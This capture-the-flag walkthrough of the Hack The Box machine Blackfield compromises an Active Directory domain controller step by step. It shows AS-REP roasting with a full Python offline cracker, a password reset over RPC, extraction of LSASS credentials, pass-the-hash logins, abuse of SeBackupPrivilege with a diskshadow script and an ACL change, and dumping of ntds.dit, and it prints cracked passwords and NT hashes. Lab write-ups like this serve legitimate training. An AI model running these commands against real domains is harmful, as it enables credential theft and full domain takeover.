Blackfield was released on 6 June 2020 and is rated Hard.
From nmap we can tell that we are dealing with an Active Directory domain controller. Anonymous SMB access is allowed, and the profiles$ share lists a large number of user directories; a few names stand out because they do not start with a capital letter. Testing those names for accounts that do not require Kerberos pre-authentication (AS-REP roasting) yields a crackable hash and a first set of credentials. That user cannot read anything new, but it turns out to be allowed to reset another user's password. The second account can reach a share with sensitive forensic artefacts, including an LSASS memory dump from which the NT hash of svc_backup can be recovered, and that hash gives us the user flag. For privilege escalation, svc_backup holds SeBackupPrivilege, which can be abused to copy the domain database (ntds.dit) out of a shadow copy and extract the Administrator hash.
nmap -sV -sC --top-ports=6000 10.10.10.192
The services nmap reports (Kerberos on 88, SMB, WinRM on 5985) show that this is an Active Directory domain controller.
SMB Shares Enumeration
Because SMB is enabled, I wanted to check for SMB shares.
smbclient -L 10.10.10.192
Only one share, profiles$, is accessible anonymously.
It contains a directory per domain user. The directories themselves are empty, so there is nothing useful in the files, but the directory names form a list of valid usernames, which is exactly what the next step needs.
Also, anonymous login with RPC failed.
After enumerating the remaining services I determined that none of them offered further anonymous enumeration, so, since this is an Active Directory machine, I looked at the common Active Directory attack vectors.
Kerberos is reachable, so we can test the usernames collected from profiles$ for accounts that have Kerberos pre-authentication disabled (AS-REP roasting). For such an account the KDC hands out an AS-REP without any proof of the password; its encrypted part is keyed with the user's password-derived key, so the blob can be cracked offline with john or hashcat.
Contents of usernames.txt
python GetNPUsers.py blackfield/dc-01 -usersfile usernames.txt -format john -outputfile intercepted_hash
Cracking the intercepted hash
john --wordlist=/usr/share/wordlists/rockyou.txt intercepted_hash
Cracked password: #00^BlackKnight
The credentials are: support:#00^BlackKnight
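The AS-REP roast above works because the encrypted part of the AS-REP is keyed only by the user's NT hash. The following Python is an added example (not code from this write-up, from impacket or from john): it rebuilds an etype-23 AS-REP blob for the cracked password and then recovers the password from a small wordlist the same way john does. It assumes the realm BLACKFIELD.LOCAL, a placeholder body in place of the real DER-encoded EncASRepPart, and a constructed wordlist in place of rockyou; everything runs offline.

```python
"""AS-REP roast verification for Kerberos etype 23 (RC4-HMAC, RFC 4757). Added example, not
impacket/john code: the enc-part is keyed only by the NT hash of the user's password, so each
candidate can be tested offline against the checksum that GetNPUsers printed."""
import hashlib
import hmac
import struct
MASK32 = 0xFFFFFFFF
ASREP_RC4_USAGE = 8  # RFC 4757 usage for the AS-REP enc-part (RFC 4120 usage 3 maps to 8 for RC4)

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled on OpenSSL 3 builds."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4]), b, c
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> bytes:
    """The RC4-HMAC long-term key is just the NT hash: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation, XORed onto the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()

def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """KDC side (RFC 4757 section 6): checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = hmac_md5(k1, data)
    return checksum + rc4(hmac_md5(k1, checksum), data)

def rc4_hmac_decrypt(key: bytes, usage: int, blob: bytes):
    """Client/cracker side: the plaintext (confounder stripped) if the checksum verifies, else None."""
    checksum, edata = blob[:16], blob[16:]
    k1 = hmac_md5(key, struct.pack("<I", usage))
    data = rc4(hmac_md5(k1, checksum), edata)
    if not hmac.compare_digest(hmac_md5(k1, data), checksum):
        return None  # wrong key: this is what rejects every bad candidate
    return data[8:]

def parse_asrep_hash(line: str):
    """GetNPUsers output, john form $krb5asrep$user@REALM:cksum$edata or hashcat form with $23$ in front."""
    prefix = "$krb5asrep$"
    if not line.startswith(prefix):
        raise ValueError("not a krb5asrep hash line")
    body = line[len(prefix):].strip()
    head, _, rest = body.partition("$")
    if head.isdigit():  # hashcat form carries the etype in front
        if int(head) != 23:
            raise ValueError(f"etype {head} is not RC4-HMAC; only etype 23 is handled here")
        body = rest
    principal, _, payload = body.partition(":")
    user, _, realm = principal.partition("@")
    checksum_hex, _, edata_hex = payload.partition("$")
    return user, realm, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)

def crack_asrep(line: str, wordlist):
    """First candidate whose NT hash decrypts the enc-part with a valid checksum, else None."""
    _user, _realm, checksum, edata = parse_asrep_hash(line)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), ASREP_RC4_USAGE, checksum + edata) is not None:
            return candidate
    return None

# Constructed sample (not the box's real AS-REP): built with the password the write-up cracked,
# a fixed confounder and a placeholder body instead of a DER-encoded EncASRepPart; the realm
# BLACKFIELD.LOCAL is assumed and WORDLIST stands in for rockyou.
SAMPLE_PASSWORD = "#00^BlackKnight"
SAMPLE_BLOB = rc4_hmac_encrypt(nt_hash(SAMPLE_PASSWORD), ASREP_RC4_USAGE,
                               b"constructed EncASRepPart placeholder", bytes(range(8)))
SAMPLE_HASH_LINE = f"$krb5asrep$support@BLACKFIELD.LOCAL:{SAMPLE_BLOB[:16].hex()}${SAMPLE_BLOB[16:].hex()}"
WORDLIST = ["password", "Welcome1", "Summer2020!", SAMPLE_PASSWORD]
```

crack_asrep(SAMPLE_HASH_LINE, WORDLIST) returns "#00^BlackKnight"; the same function accepts a real line from GetNPUsers in either output format. The cost per candidate is one MD4, three HMAC-MD5 calls and one RC4 pass, which is why a GPU cracker gets through rockyou in seconds and why disabling pre-authentication on any account is a finding in itself.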
These credentials did not get me into any additional SMB share, but they do work for rpcclient.
rpcclient -U support 10.10.10.192
First, I enumerated the domain users.
rpcclient has a command called setuserinfo2, which sets a user's password (information level 23 carries the new password). Whether it succeeds depends on the ACL of the target account: the caller needs the reset-password right (User-Force-Change-Password) on that object.
The only account for which this worked was audit2020, so support evidently holds that right over it. Resetting a password is noisy and locks the real user out, so on a real engagement it should only be done with the client's agreement.
setuserinfo2 audit2020 23 IceL0rd
Now that audit2020 has a password we know, we can check whether that account reaches any additional SMB share.
Access SMB share with updated password
Connecting to the forensic share.
smbclient -U 'blackfield\audit2020' //10.10.10.192/forensic
Enumerating the share, I found memory_analysis/lsass.zip, a memory dump of the LSASS process; such a dump holds the credential material of every session that was logged on when it was taken, so it is likely to contain a hash.
Now download lsass.zip
smbget smb://10.10.10.192/forensic/memory_analysis/lsass.zip -U audit2020
After unzipping the archive, I used pypykatz to parse the LSASS minidump and read out the cached credentials:
pypykatz lsa minidump lsass.DMP
The output lists the logon sessions captured in the dump together with their credential material; among them is the NT hash of svc_backup, which is what the next step uses.
Pass the hash svc_backup
Because port 5985 (WinRM) is open, evil-winrm can log in with the NT hash directly (pass-the-hash); no plaintext password is needed:
evil-winrm -i blackfield -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'
Enumerating the token's privileges (whoami /priv) shows that SeBackupPrivilege is enabled. This privilege lets its holder open any file for reading with backup semantics, regardless of the file's ACL, which is what the rest of the escalation builds on.
Note: the SeBackupPrivilege DLLs used below come from giuliano108's GitHub repository; Secwalk is not responsible for that content or for any damage caused by it.
Exploiting the SeBackupPrivilege token
First, download the two DLLs from the repository (SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll, see resource) and upload them to the target.
Then import both DLLs with Import-Module and enable the privilege with Set-SeBackupPrivilege; Copy-FileSeBackupPrivilege from the same module copies a file with backup semantics, which bypasses the file's ACL.
Copying out the root flag and reading it this way did not work, so the next target is the domain database instead.
Changing file permissions on NTDS
What we can do is change the permissions on the NTDS directory so that ntds.dit (the Active Directory database, which contains the Administrator hash) is accessible. Note that SeBackupPrivilege already lets us read the file regardless of its ACL; what blocks a plain copy is that the running directory service keeps ntds.dit open exclusively, which is why the shadow copy below is still needed.
$folder = "C:\Windows\NTDS"        # directory holding ntds.dit (default location, assumed)
$user = "blackfield\svc_backup"    # account that should get full control
$acl = Get-Acl $folder
$rule = New-Object System.Security.AccessControl.FileSystemAccessRule $user, "FullControl", "ContainerInherit,ObjectInherit", "None", "Allow"
$acl.SetAccessRule($rule)          # the ACE has to be added to the ACL object before it is written back
Set-Acl -Path $folder -AclObject $acl
To create a shadow copy, we run diskshadow with the following script (create takes the snapshot, expose mounts it as drive Z:):
set metadata C:\temp\backup.cab
set context clientaccessibles
set context persistents
add volume c: alias mydrives
creates
expose %mydrive% z:s
The trailing character on each command line is deliberate padding: diskshadow drops the last character of every line of the uploaded script (most likely a line-ending issue), so without the padding the commands come out truncated; with it, persistents becomes persistent, mydrives becomes mydrive and z:s becomes z:.
Upload the script to the target system and run it:
diskshadow /s script.txt
Z: now holds a consistent snapshot of the system volume. Two files are needed to extract the hashes: ntds.dit, copied out of the snapshot with Copy-FileSeBackupPrivilege (the live copy is locked), and the SYSTEM registry hive, which holds the boot key that encrypts the hashes inside ntds.dit (exported with reg save HKLM\SYSTEM SYSTEM.bak). Download both.
With the two files on the Kali system, secretsdump.py can extract the hashes offline:
python secretsdump.py -ntds ntds.dit -system SYSTEM.bak LOCAL -outputfile admin_hash
head -n 5 admin_hash.ntds
Pass the hash Administrator
evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee
Made by: IceL0rd
Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.